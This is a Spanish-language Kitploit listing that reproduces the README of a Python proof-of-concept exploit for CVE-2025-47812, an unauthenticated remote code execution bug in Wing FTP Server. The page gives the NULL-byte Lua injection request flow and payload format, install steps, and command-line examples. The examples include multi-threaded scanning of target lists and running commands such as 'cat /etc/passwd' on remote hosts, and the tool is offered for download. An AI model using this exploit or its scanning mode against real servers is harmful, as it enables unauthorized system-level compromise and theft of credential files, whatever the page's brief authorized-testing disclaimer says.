Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-471812-POC — Python PoC para CVE-2025-47812, RCE no autenticado en Wing FTP Server <= 7.4.3 mediante inyección Lua con byte NULL en archivos de sesión | Kitploit
Herramientas/GitHubGitHub/d3vn0mi/cve-2025-471812-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubd3vn0mi/cve-2025-471812-poc

CVE-2025-471812-POC

Python PoC para CVE-2025-47812, RCE no autenticado en Wing FTP Server <= 7.4.3 mediante inyección Lua con byte NULL en archivos de sesión

Ver Repositorio
1hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
root@kitploit:~
     ____  _______   ___   __ ____  __  ___ ____
    / __ \|__  /  | / / | / / __ \/  |/  // _/
   / / / / /_ <| | / /| |/ / / / / /|_/ / / /
  / / /_/___/ /| |/ / |   / /_/ / /  / /_/ /
 /_____/____/ |___/  |_/  \____/_/  /_/____/

CVE-2025-47812 — Wing FTP Server <= 7.4.3 RCE no autenticada

Exploit de prueba de concepto para CVE-2025-47812, una vulnerabilidad de ejecución remota de código no autenticada en Wing FTP Server versiones anteriores a la 7.4.4.

Resumen de la vulnerabilidad

CampoDetalle
CVECVE-2025-47812
AfectadoWing FTP Server <= 7.4.3
TipoEjecución remota de código no autenticada
Privilegiosroot (Linux) / SYSTEM (Windows)
Vendedorwftpserver.com
Autor originalSheikh Mohammad Hasan aka 4m3rr0r
Modificado pord3vn0mi

Causa raíz

La función c_CheckUser() de Wing FTP Server trunca el nombre de usuario en un byte nulo (%00) para fines de autenticación, pero el nombre de usuario completo sin sanitizar — incluyendo todo lo que va después del byte nulo — se escribe en un archivo de sesión Lua. Cuando se accede a un endpoint autenticado como /dir.html, el servidor ejecuta ese archivo de sesión, activando el código Lua inyectado con privilegios elevados.

Flujo de explotación

root@kitploit:~
1. POST /loginok.html
   username=anonymous%00]]<LUA_PAYLOAD>&password=

2. El servidor autentica "anonymous" (truncado en el byte nulo)
   pero escribe el payload completo en el archivo de sesión → devuelve cookie UID

3. GET /dir.html  (Cookie: UID=<extracted_uid>)
   El servidor carga el archivo de sesión → ejecuta Lua inyectado → RCE

Instalación

root@kitploit:~
git clone https://github.com/d3vn0mi/cve_2025_471812_poc.git
cd cve_2025_471812_poc
pip install requests

Uso

Verificación rápida de vulnerabilidad

root@kitploit:~
python3 exploit.py -u http://TARGET

Ejecutar un comando

root@kitploit:~
python3 exploit.py -u http://TARGET -c 'id'

Escanear varios objetivos desde un archivo

root@kitploit:~
python3 exploit.py -f targets.txt -o vulnerable.txt -t 8

Opciones completas

root@kitploit:~
usage: exploit.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME]
                  [-P PASSWORD] [-v] [-o OUTPUT] [-l LOG_FILE]
                  [-t THREADS] [--timeout TIMEOUT] [--retries RETRIES]
                  [--no-verify]

target:
  -u, --url URL           URL del objetivo único (ej. http://192.168.134.130)
  -f, --file FILE         Archivo que contiene URLs de objetivos (uno por línea, se permiten comentarios #)

exploit options:
  -c, --command COMMAND   Comando a ejecutar en el servidor remoto (activa salida verbose)
  -U, --username USERNAME Usuario para el payload del exploit (por defecto: anonymous)
  -P, --password PASSWORD Contraseña para el payload del exploit (por defecto: vacía)

output:
  -v, --verbose           Activar registro verbose / debug
  -o, --output OUTPUT     Guardar URLs vulnerables en este archivo
  -l, --log-file LOG_FILE Escribir registro detallado en este archivo

network:
  -t, --threads THREADS   Hilos concurrentes para escaneos multi-objetivo (por defecto: 1)
  --timeout TIMEOUT       Tiempo de espera de solicitud HTTP en segundos (por defecto: 15)
  --retries RETRIES       Número de reintentos en fallo de conexión (por defecto: 2)
  --no-verify             Deshabilitar verificación de certificado SSL

Ejemplos

root@kitploit:~
# Verificar un objetivo único
python3 exploit.py -u http://192.168.1.10

# Ejecutar 'whoami' y ver la salida completa
python3 exploit.py -u http://192.168.1.10 -c 'whoami'

# Escanear una lista con 8 hilos, registrar todo en un archivo
python3 exploit.py -f targets.txt -t 8 -l scan.log -o vuln.txt

# Usar credenciales personalizadas con verificación SSL deshabilitada
python3 exploit.py -u https://10.0.0.5 -U admin -P secret -c 'cat /etc/passwd' --no-verify

# Modo verbose para depuración
python3 exploit.py -u http://192.168.1.10 -v

Características

  • Registro estructurado — Salida de consola con código de colores (DEBUG/INFO/WARN/ERROR) + registro opcional en archivo mediante --log-file
  • Escaneo multi-hilo — Escaneo paralelo de objetivos con -t para listas grandes
  • Reintento con retroceso — Retroceso exponencial automático en fallos de red (reintentos configurables con --retries)
  • Flexibilidad SSL — --no-verify para certificados autofirmados
  • Escaneo por lotes — Archivos de objetivos soportan comentarios # y deduplicación automática
  • Salida limpia — El modo de verificación de vulnerabilidad da un resultado simple VULNERABLE/NO VULNERABLE; -c muestra la salida completa del comando

Aviso legal

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. Úsela solo contra sistemas que posea o para los que tenga permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no son responsables de ningún uso indebido o daño causado por esta herramienta.

Créditos

  • Exploit original por 4m3rr0r
  • Modificado y mejorado por d3vn0mi
Descargar herramienta